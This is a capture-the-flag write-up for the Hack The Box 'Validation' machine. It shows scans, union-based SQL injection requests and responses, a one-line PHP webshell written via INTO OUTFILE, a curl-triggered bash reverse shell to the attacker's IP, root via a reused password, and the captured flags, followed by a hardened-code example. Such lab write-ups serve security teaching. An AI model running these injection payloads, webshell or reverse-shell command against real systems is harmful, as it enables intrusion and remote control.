HTB Validation done
Validation
Notes
OS:
Linux
Technology:
MariaDB 10.5.11
IP Address:
10.129.95.235
Open ports:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.48 ((Debian))
4566/tcp open http nginx
5000/tcp filtered upnp
5001/tcp filtered commplex-link
5002/tcp filtered rfe
5003/tcp filtered filemaker
5004/tcp filtered avt-profile-1
5005/tcp filtered avt-profile-2
5006/tcp filtered wsm-server
5007/tcp filtered wsm-server-ssl
5008/tcp filtered synapsis-edge
8080/tcp open http nginx
Users and passwords:
From file: /var/www/html/config.php
U: uhc
P: uhc-9qual-global-pw
---
U: root
P: uhc-9qual-global-pw
Nmap
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Validation]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.95.235_nmap 10.129.95.235 ; cat 10.129.95.235_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-04 14:08 CEST
Nmap scan report for 10.129.95.235
Host is up (0.039s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
| 256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_ 256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.48 (Debian)
4566/tcp open http nginx
|_http-title: 403 Forbidden
5000/tcp filtered upnp
5001/tcp filtered commplex-link
5002/tcp filtered rfe
5003/tcp filtered filemaker
5004/tcp filtered avt-profile-1
5005/tcp filtered avt-profile-2
5006/tcp filtered wsm-server
5007/tcp filtered wsm-server-ssl
5008/tcp filtered synapsis-edge
8080/tcp open http nginx
|_http-title: 502 Bad Gateway
ffuf: http://10.129.95.235/FUZZ
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Validation]
└─$ ffuf -u http://10.129.95.235/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 10.129.95.235_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.95.235/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md .git
:: Output file : 10.129.95.235_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
account.php [Status: 200, Size: 16, Words: 2, Lines: 1, Duration: 35ms]
config.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 38ms]
css [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 40ms]
[INFO] Adding a new job to the queue: http://10.129.95.235/css/FUZZ
index.php [Status: 200, Size: 16088, Words: 4698, Lines: 269, Duration: 83ms]
js [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 40ms]
[INFO] Adding a new job to the queue: http://10.129.95.235/js/FUZZ
[INFO] Starting queued job on target: http://10.129.95.235/css/FUZZ
[INFO] Starting queued job on target: http://10.129.95.235/js/FUZZ
:: Progress: [163752/163752] :: Job [3/3] :: 862 req/sec :: Duration: [0:03:03] :: Errors: 0 ::
SQLi via POST request
POST / HTTP/1.1
Host: 10.129.95.235
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: http://10.129.95.235
Connection: keep-alive
Referer: http://10.129.95.235/
Cookie: user=5a105e8b9d40e1329780d62ea2265d8a
Upgrade-Insecure-Requests: 1
Priority: u=0, i
username=test1&country=Afganistan'
---
HTTP/1.1 200 OK
Date: Mon, 07 Apr 2025 10:37:32 GMT
Server: Apache/2.4.48 (Debian)
X-Powered-By: PHP/7.4.23
Vary: Accept-Encoding
Content-Length: 850
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->
<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome test1</h1><h3 class="text-white">Other Players In Afganistan'</h3><br />
<b>Fatal error</b>: Uncaught Error: Call to a member function fetch_assoc() on bool in /var/www/html/account.php:33
Stack trace:
#0 {main}
thrown in <b>/var/www/html/account.php</b> on line <b>33</b><br />
Enumerate database
Check DB version
HTTP/1.1 200 OK
Date: Mon, 07 Apr 2025 11:01:56 GMT
Server: Apache/2.4.48 (Debian)
X-Powered-By: PHP/7.4.23
Vary: Accept-Encoding
Content-Length: 734
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->
<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome test</h1><h3 class="text-white">Other Players In Afganistan' union select @@version -- '</h3><li class='text-white'>10.5.11-MariaDB-1</li> </div>
</section>
</div>
Check username
HTTP/1.1 200 OK
Date: Mon, 07 Apr 2025 11:29:16 GMT
Server: Apache/2.4.48 (Debian)
X-Powered-By: PHP/7.4.23
Vary: Accept-Encoding
Content-Length: 727
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->
<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome test</h1><h3 class="text-white">Other Players In Afganistan' union select user() -- '</h3><li class='text-white'>uhc@localhost</li> </div>
</section>
</div>
Check DB name
HTTP/1.1 200 OK
Date: Mon, 07 Apr 2025 11:30:02 GMT
Server: Apache/2.4.48 (Debian)
X-Powered-By: PHP/7.4.23
Vary: Accept-Encoding
Content-Length: 730
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->
<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome test</h1><h3 class="text-white">Other Players In Afganistan' union select database() -- '</h3><li class='text-white'>registration</li> </div>
</section>
</div>
Check schema_name
HTTP/1.1 200 OK
Date: Mon, 07 Apr 2025 11:33:20 GMT
Server: Apache/2.4.48 (Debian)
X-Powered-By: PHP/7.4.23
Vary: Accept-Encoding
Content-Length: 889
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->
<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome test</h1><h3 class="text-white">Other Players In Afganistan' union select schema_name from information_schema.schemata -- '</h3><li class='text-white'>information_schema</li><li class='text-white'>performance_schema</li><li class='text-white'>mysql</li><li class='text-white'>registration</li> </div>
</section>
</div>
Check table_name
HTTP/1.1 200 OK
Date: Mon, 07 Apr 2025 11:34:37 GMT
Server: Apache/2.4.48 (Debian)
X-Powered-By: PHP/7.4.23
Vary: Accept-Encoding
Content-Length: 797
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->
<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome test</h1><h3 class="text-white">Other Players In Afganistan' union select table_name from information_schema.tables where table_schema = 'registration' -- '</h3><li class='text-white'>registration</li> </div>
</section>
</div>
Check column_name
HTTP/1.1 200 OK
Date: Mon, 07 Apr 2025 11:35:43 GMT
Server: Apache/2.4.48 (Debian)
X-Powered-By: PHP/7.4.23
Vary: Accept-Encoding
Content-Length: 899
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->
<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome test</h1><h3 class="text-white">Other Players In Afganistan' union select column_name from information_schema.columns where table_name = 'registration' -- '</h3><li class='text-white'>username</li><li class='text-white'>userhash</li><li class='text-white'>country</li><li class='text-white'>regtime</li> </div>
</section>
</div>
Check privileges for user uhc@localhost
HTTP/1.1 200 OK
Date: Mon, 07 Apr 2025 11:36:44 GMT
Server: Apache/2.4.48 (Debian)
X-Powered-By: PHP/7.4.23
Vary: Accept-Encoding
Content-Length: 2244
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->
<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome test</h1><h3 class="text-white">Other Players In Afganistan' union select privilege_type FROM information_schema.user_privileges where grantee = "'uhc'@'localhost'" -- '</h3><li class='text-white'>SELECT</li><li class='text-white'>INSERT</li><li class='text-white'>UPDATE</li><li class='text-white'>DELETE</li><li class='text-white'>CREATE</li><li class='text-white'>DROP</li><li class='text-white'>RELOAD</li><li class='text-white'>SHUTDOWN</li><li class='text-white'>PROCESS</li><li class='text-white'>FILE</li><li class='text-white'>REFERENCES</li><li class='text-white'>INDEX</li><li class='text-white'>ALTER</li><li class='text-white'>SHOW DATABASES</li><li class='text-white'>SUPER</li><li class='text-white'>CREATE TEMPORARY TABLES</li><li class='text-white'>LOCK TABLES</li><li class='text-white'>EXECUTE</li><li class='text-white'>REPLICATION SLAVE</li><li class='text-white'>BINLOG MONITOR</li><li class='text-white'>CREATE VIEW</li><li class='text-white'>SHOW VIEW</li><li class='text-white'>CREATE ROUTINE</li><li class='text-white'>ALTER ROUTINE</li><li class='text-white'>CREATE USER</li><li class='text-white'>EVENT</li><li class='text-white'>TRIGGER</li><li class='text-white'>CREATE TABLESPACE</li><li class='text-white'>DELETE HISTORY</li><li class='text-white'>SET USER</li><li class='text-white'>FEDERATED ADMIN</li><li class='text-white'>CONNECTION ADMIN</li><li class='text-white'>READ_ONLY ADMIN</li><li class='text-white'>REPLICATION SLAVE ADMIN</li><li class='text-white'>REPLICATION MASTER ADMIN</li><li class='text-white'>BINLOG ADMIN</li><li class='text-white'>BINLOG REPLAY</li><li class='text-white'>SLAVE MONITOR</li> </div>
</section>
</div>
Create revshell
Upload webshell
HTTP/1.1 200 OK
Date: Mon, 07 Apr 2025 12:03:15 GMT
Server: Apache/2.4.48 (Debian)
X-Powered-By: PHP/7.4.23
Vary: Accept-Encoding
Content-Length: 944
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->
<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome df</h1><h3 class="text-white">Other Players In Afganistan' union select "<?php SYSTEM($_REQUEST['cmd']); ?>" into outfile '/var/www/html/revshell.php' -- '</h3><br />
<b>Fatal error</b>: Uncaught Error: Call to a member function fetch_assoc() on bool in /var/www/html/account.php:33
Stack trace:
#0 {main}
thrown in <b>/var/www/html/account.php</b> on line <b>33</b><br />
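Added example, not the box's own account.php (the page never shows it): a reconstruction of the query pattern that the fatal error at account.php:33 implies (country concatenated into the SQL, fetch_assoc() called on the false that mysqli returns on a syntax error), beside a hardened version. Table and column names come from the enumeration above; the function names are assumptions.

```php
<?php
// Added example: reconstructed query pattern for account.php, vulnerable and hardened.
// Assumes config.php defines $conn exactly as shown on the page.
require_once 'config.php';

// VULNERABLE (reconstructed): $_POST['country'] is interpolated unescaped, so a value
// such as  Afganistan' union select @@version -- '  rewrites the query, and a bare
// quote makes query() return false, which produces the fetch_assoc()-on-bool error.
function other_players_vulnerable(mysqli $conn, string $country): array {
    $sql = "SELECT username FROM registration WHERE country = '" . $country . "'";
    $result = $conn->query($sql);            // false on SQL error, not a result object
    $players = [];
    while ($row = $result->fetch_assoc()) {  // fatal when $result is false
        $players[] = $row['username'];
    }
    return $players;
}

// HARDENED: prepared statement with a bound parameter, exceptions instead of
// HTML-rendered fatal errors, and output escaped before it reaches the page.
function other_players_safe(mysqli $conn, string $country): array {
    mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
    $stmt = $conn->prepare("SELECT username FROM registration WHERE country = ?");
    $stmt->bind_param('s', $country);        // value travels separately from the SQL text
    $stmt->execute();
    $players = [];
    foreach ($stmt->get_result()->fetch_all(MYSQLI_ASSOC) as $row) {
        $players[] = htmlspecialchars($row['username'], ENT_QUOTES, 'UTF-8');
    }
    return $players;
}

try {
    $country = $_POST['country'] ?? '';
    foreach (other_players_safe($conn, $country) as $name) {
        echo "<li class='text-white'>{$name}</li>";
    }
} catch (mysqli_sql_exception $e) {
    error_log($e->getMessage());             // log server-side; never echo paths or traces
    http_response_code(500);
    echo "<li class='text-white'>Unable to load players</li>";
}
```

The prepared statement closes the injection, but the chain above also needed the uhc account to hold FILE (and the web root to be writable by the database server), so the application user should be granted only SELECT/INSERT on registration and secure_file_priv should point away from /var/www/html.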
Start revshell
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Validation]
└─$ netcat -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.57] from (UNKNOWN) [10.129.224.149] 39378
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@validation:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Validation]
└─$ curl 10.129.224.149/revshell.php --data-urlencode 'cmd=bash -c "bash -i >& /dev/tcp/10.10.14.57/4444 0>&1"'
Spawning TTY shell
script /dev/null -c bash
CTRL+Z
stty raw -echo ; fg
reset
screen
Read flag: user.txt
www-data@validation:/var/www/html$ find / -name "user.txt" 2>/dev/null
/home/htb/user.txt
www-data@validation:/var/www/html$
www-data@validation:/var/www/html$ cat /home/htb/user.txt
569a5a9f811f2db3a11ec9bc56aa11da
www-data@validation:/var/www/html$
Read file: /var/www/html/config.php
Found creds:
U: uhc
P: uhc-9qual-global-pw
---
www-data@validation:/var/www/html$ ls -a
. .. account.php config.php css index.php js
www-data@validation:/var/www/html$ cat config.php
<?php
$servername = "127.0.0.1";
$username = "uhc";
$password = "uhc-9qual-global-pw";
$dbname = "registration";
$conn = new mysqli($servername, $username, $password, $dbname);
?>
Read flag: root.txt
U: root
P: uhc-9qual-global-pw
---
www-data@validation:/var/www/html$ su root
Password:
root@validation:/var/www/html#
root@validation:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@validation:/var/www/html#
root@validation:/var/www/html# cd /root/
root@validation:~#
root@validation:~# ls -a
. .bash_history .lesshst .profile .vim ipp.ko
.. .bashrc .local .selected_editor .viminfo root.txt
.aws .cache .passwd-s3fs .ssh config snap
root@validation:~#
root@validation:~# cat root.txt
f5c67d4157797d8f57836bc151368950
root@validation:~#
References
Lessons Learned